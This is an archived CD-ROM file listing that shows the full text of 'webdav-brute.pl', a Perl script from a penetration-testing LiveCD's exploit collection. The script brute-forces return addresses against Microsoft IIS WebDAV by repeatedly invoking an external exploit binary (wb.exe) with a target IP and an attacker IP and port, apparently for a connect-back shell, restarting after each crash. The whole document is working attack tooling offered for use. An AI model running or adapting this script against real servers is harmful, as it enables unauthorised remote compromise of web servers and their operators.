Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / iis / webdav-brute.pl < prev next >

Wrap

Perl Script | 2005-02-12 | 1KB | 41 lines

#!/usr/bin/perl # # Written by Alon Swartz # Version 0.1 # Uses updated coros wb.exe and bruteforces return address using pre-defined values. # If not successful, it does a straight forward bruteforce (1-255) # 09/06/2003 # Version 0.2 - Being used in the SecurityForest Exploitation Framework. # Quick Fix (path) $exploitpath = "D:\\Data\\tools\\SF\\ExploitTree\\application\\webserver\\iis\\wb.exe"; @preret = ("194","195","193","191","196","192","197","198","199","208","209","205","206","12","215","200","201","202","203","204","207","208"); if ($#ARGV != 2) {die "Usage: webdav-brute.pl <target_ip> <attackers_ip> <attackers_port>\n\nCoded by Alon Swartz, v0.2\nUpdated coro's wb.exe and bruteforces return address using pre-defined values\nIf not successful, it does a straight forward bruteforce (1-255)\n";} $target_ip = @ARGV[0]; $attackers_ip = @ARGV[1]; $attackers_port = @ARGV[2]; print "Loading ret values: @preret\n\n"; foreach $preret (@preret) { print "\n\n-----------------------------\n[ret: $preret -ASCII]"; system "$exploitpath $target_ip $attackers_ip $attackers_port $preret"; print "Waiting for webserver to restart...\n"; sleep 10; } print "If we get here, the pre-defined rets were not successful, chances are slim we will succeed\n"; $i=1; while ($i < 256) { print "[ret: $i]-ASCII\n"; system "$exploitpath $target_ip $attackers_ip $attackers_port $i"; print "Waiting for webserver to restart itself\n"; sleep 10; }